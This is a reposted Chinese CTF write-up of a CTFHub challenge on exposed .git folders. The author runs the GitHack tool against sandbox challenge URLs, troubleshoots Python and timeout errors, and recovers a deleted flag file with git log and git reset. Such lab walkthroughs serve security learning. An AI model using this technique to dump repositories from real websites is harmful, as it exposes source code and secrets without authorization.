一、开搞
当前大量开发人员使用git进行版本控制,对站点自动部署。如果配置不当,可能会将.git文件夹直接部署到线上环境。这就引起了git泄露漏洞。请尝试使用BugScanTeam的GitHack完成本题
在这题上花了好长时间,一直没有做出来。
先是捣鼓git软件怎么使用。
二、坑 一
我用的是新版kali环境做的题目(kali日期为2022-3,这个版本安装了python2和python3。后面使用命令要注意,我在这里踩坑了。)。
┌──(root㉿kali)-[~/Downloads/GitHack-master]
└─# python3 GitHack.py http://challenge-4e45df1c40b42551.sandbox.ctfhub.com:10800/.git
Traceback (most recent call last):
File "/root/Downloads/GitHack-master/GitHack.py", line 11, in <module>
from lib.common import banner
File "/root/Downloads/GitHack-master/lib/common.py", line 84
except IOError, ex:
^^^^^^^^^^^
SyntaxError: multiple exception types must be parenthesized
刚开始的时候不知道git命令,直接百度。搜索出来一堆乱七八糟的。挨个翻看。做后确定命令格式为:python2 GitHack.py http://challenge-4e45df1c40b42551.sandbox.ctfhub.com:10800/.git/
三、坑 二
但是执行的时候会报错
┌──(root㉿kali)-[~/Downloads/GitHack-master]
└─# python2 GitHack.py http://challenge-4e45df1c40b42551.sandbox.ctfhub.com:10800/.git
____ _ _ _ _ _
/ ___(_) |_| | | | __ _ ___| | __
| | _| | __| |_| |/ _` |/ __| |/ /
| |_| | | |_| _ | (_| | (__| <
\____|_|\__|_| |_|\__,_|\___|_|\_\{0.0.5}
A '.git' folder disclosure exploit.
[*] Check Depends
[+] Check depends end
[*] Set Paths
[*] Target Url: http://challenge-4e45df1c40b42551.sandbox.ctfhub.com:10800/.git/
[*] Initialize Target
[*] Try to Clone straightly
[*] Clone
正克隆到 '/root/Downloads/GitHack-master/dist/challenge-4e45df1c40b42551.sandbox.ctfhub.com_10800'...
fatal: 仓库 'http://challenge-4e45df1c40b42551.sandbox.ctfhub.com:10800/.git/' 未找到
[-] Clone Error
[*] Try to Clone with Directory Listing
[*] http://challenge-4e45df1c40b42551.sandbox.ctfhub.com:10800/.git/ is not support Directory Listing
[-] [Skip][First Try] Target is not support Directory Listing
[*] Try to clone with Cache
[*] Initialize Git
[!] Initialize Git Error: 提示:使用 'master' 作为初始分支的名称。这个默认分支名称可能会更改。要在新仓库中
提示:配置使用初始分支名,并消除这条警告,请执行:
提示:
提示: git config --global init.defaultBranch <名称>
提示:
提示:除了 'master' 之外,通常选定的名字有 'main'、'trunk' 和 'development'。
提示:可以通过以下命令重命名刚创建的分支:
提示:
提示: git branch -m <name>
[*] Cache files
[*] packed-refs
[*] config
[*] HEAD
[*] COMMIT_EDITMSG
[*] ORIG_HEAD
[*] FETCH_HEAD
[*] refs/heads/master
[*] refs/remote/master
[*] index
[*] logs/HEAD
[*] refs/heads/master
[*] logs/refs/heads/master
[*] logs/refs/remote/master
[*] logs/refs/stash
[*] refs/stash
Traceback (most recent call last):
File "GitHack.py", line 40, in <module>
main()
File "GitHack.py", line 21, in main
init()
File "GitHack.py", line 35, in init
start()
File "/root/Downloads/GitHack-master/lib/controler.py", line 21, in start
if method_a() or method_b() or method_c():
File "/root/Downloads/GitHack-master/lib/controler.py", line 56, in method_c
clone_from_cache()
File "/root/Downloads/GitHack-master/lib/git.py", line 116, in clone_from_cache
cache_objects()
File "/root/Downloads/GitHack-master/lib/git.py", line 265, in cache_objects
for entry in parse_index(os.path.join(paths.GITHACK_DIST_TARGET_GIT_PATH, "index")):
File "/root/Downloads/GitHack-master/lib/git.py", line 291, in parse_index
with open(filename, "rb") as o:
IOError: [Errno 2] No such file or directory: '/root/Downloads/GitHack-master/dist/challenge-4e45df1c40b42551.sandbox.ctfhub.com_10800/.git/index'
四、后面还没找到头绪,有哪位大侠能指点指点。
看别人的博客正常应该是
案例一
扫描成功后githack会生成一个文件夹dist,里面存放着重新生成的文件
使用git log查看历史记录
可以看见文件有过三次操作,remove flag add flag和init
那么我们获取flag就可以用diff对面前后的flag操作
flag
1.法一使用git diff文件对比
git diff d7b0a8166625cd0c0e09ff80aeb44d023fa9b012 21141e26cc1462d5b872e5cc166bdb1807f9a060
法二git reset回退文件版本
git reset --hard d7b0a8166625cd0c0e09ff80aeb44d023fa9b012
案例二
2.使用GitHack进行网页git文件备份下载,然后进行查看
3.在list目录下打开文件夹,进入git bash here,根据题目log提示
使用 git log 查看提交历史,发现上一个版本叫add flag,于是恢复到上一个版本
4.可以发现生成了一个txt文件,那么我们打开看看,发现得到了flag
5.那么本题到此为止,那么可以回去提交flag了 成功!!!
2022年9-25 21:48 我又回来盘它了,并且成功了
之前报错是应为题目时间到了。尴尬~~~~~
正常输出
┌──(root㉿kali)-[~/Downloads/GitHack-master]
└─# python2 GitHack.py http://challenge-cc3839282f4428a7.sandbox.ctfhub.com:10800/.git/
____ _ _ _ _ _
/ ___(_) |_| | | | __ _ ___| | __
| | _| | __| |_| |/ _` |/ __| |/ /
| |_| | | |_| _ | (_| | (__| <
\____|_|\__|_| |_|\__,_|\___|_|\_\{0.0.5}
A '.git' folder disclosure exploit.
[*] Check Depends
[+] Check depends end
[*] Set Paths
[*] Target Url: http://challenge-cc3839282f4428a7.sandbox.ctfhub.com:10800/.git/
[*] Initialize Target
[*] Try to Clone straightly
[*] Clone
正克隆到 '/root/Downloads/GitHack-master/dist/challenge-cc3839282f4428a7.sandbox.ctfhub.com_10800'...
fatal: 仓库 'http://challenge-cc3839282f4428a7.sandbox.ctfhub.com:10800/.git/' 未找到
[-] Clone Error
[*] Try to Clone with Directory Listing
[*] http://challenge-cc3839282f4428a7.sandbox.ctfhub.com:10800/.git/ is not support Directory Listing
[-] [Skip][First Try] Target is not support Directory Listing
[*] Try to clone with Cache
[*] Initialize Git
[!] Initialize Git Error: 提示:使用 'master' 作为初始分支的名称。这个默认分支名称可能会更改。要在新仓库中
提示:配置使用初始分支名,并消除这条警告,请执行:
提示:
提示: git config --global init.defaultBranch <名称>
提示:
提示:除了 'master' 之外,通常选定的名字有 'main'、'trunk' 和 'development'。
提示:可以通过以下命令重命名刚创建的分支:
提示:
提示: git branch -m <name>
[*] Cache files
[*] packed-refs
[*] config
[*] HEAD
[*] COMMIT_EDITMSG
[*] ORIG_HEAD
[*] FETCH_HEAD
[*] refs/heads/master
[*] refs/remote/master
[*] index
[*] logs/HEAD
[*] logs/refs/heads/master
[*] Fetch Commit Objects
[*] objects/79/5c7b1a9772ee6fd0c291fb1afe6157401b4215
[*] objects/01/2ae1fc6b838a345b689ae6bb4ec0edfd517a64
[*] objects/82/2e64a05799797dcbc2c5b0d0f3c2abb7d34184
[*] objects/27/1c0b7781dfcb5837db366cc652b50248d9aced
[*] objects/90/71e0a24f654c88aa97a2273ca595e301b7ada5
[*] objects/2c/59e3024e3bc350976778204928a21d9ff42d01
[*] objects/32/f9ca9df638c0fe91af9472ac6a0e977841382c
[*] objects/0d/875d79a5a65bb020fc8fd17a9bd67f6b7eacf8
[*] Fetch Commit Objects End
[*] logs/refs/remote/master
[*] logs/refs/stash
[*] refs/stash
[*] Valid Repository
[+] Valid Repository Success
[+] Clone Success. Dist File : /root/Downloads/GitHack-master/dist/challenge-cc3839282f4428a7.sandbox.ctfhub.com_10800
┌──(root㉿kali)-[~/Downloads/GitHack-master]
└─#
然后直接流水线操作
┌──(root㉿kali)-[~/Downloads/GitHack-master]
└─# cd dist/challenge-cc3839282f4428a7.sandbox.ctfhub.com_10800
┌──(root㉿kali)-[~/Downloads/GitHack-master/dist/challenge-cc3839282f4428a7.sandbox.ctfhub.com_10800]
└─# ls
50x.html index.html
┌──(root㉿kali)-[~/Downloads/GitHack-master]
└─# cd dist/challenge-cc3839282f4428a7.sandbox.ctfhub.com_10800
┌──(root㉿kali)-[~/Downloads/GitHack-master/dist/challenge-cc3839282f4428a7.sandbox.ctfhub.com_10800]
└─# ls
50x.html index.html
┌──(root㉿kali)-[~/Downloads/GitHack-master/dist/challenge-cc3839282f4428a7.sandbox.ctfhub.com_10800]
└─#
使用git log和git reset --hard命令
┌──(root㉿kali)-[~/Downloads/GitHack-master/dist/challenge-cc3839282f4428a7.sandbox.ctfhub.com_10800]
└─# git log
commit 795c7b1a9772ee6fd0c291fb1afe6157401b4215 (HEAD -> master)
Author: CTFHub <[email protected]>
Date: Sun Sep 25 13:42:40 2022 +0000
remove flag
commit 822e64a05799797dcbc2c5b0d0f3c2abb7d34184
Author: CTFHub <[email protected]>
Date: Sun Sep 25 13:42:40 2022 +0000
add flag
commit 32f9ca9df638c0fe91af9472ac6a0e977841382c
Author: CTFHub <[email protected]>
Date: Sun Sep 25 13:42:40 2022 +0000
init
┌──(root㉿kali)-[~/Downloads/GitHack-master/dist/challenge-cc3839282f4428a7.sandbox.ctfhub.com_10800]
└─#
┌──(root㉿kali)-[~/Downloads/GitHack-master/dist/challenge-cc3839282f4428a7.sandbox.ctfhub.com_10800]
└─# git reset --hard 822e64a05799797dcbc2c5b0d0f3c2abb7d34184
HEAD 现在位于 822e64a add flag
┌──(root㉿kali)-[~/Downloads/GitHack-master/dist/challenge-cc3839282f4428a7.sandbox.ctfhub.com_10800]
└─# ls
50x.html 9432810028411.txt index.html
┌──(root㉿kali)-[~/Downloads/GitHack-master/dist/challenge-cc3839282f4428a7.sandbox.ctfhub.com_10800]
└─#
vim 9432810028411.txt 可以看到flag值了。
本文转载自: https://blog.csdn.net/Mr_admin/article/details/127017328
版权归原作者 Mr_admin 所有, 如有侵权,请联系我们删除。
版权归原作者 Mr_admin 所有, 如有侵权,请联系我们删除。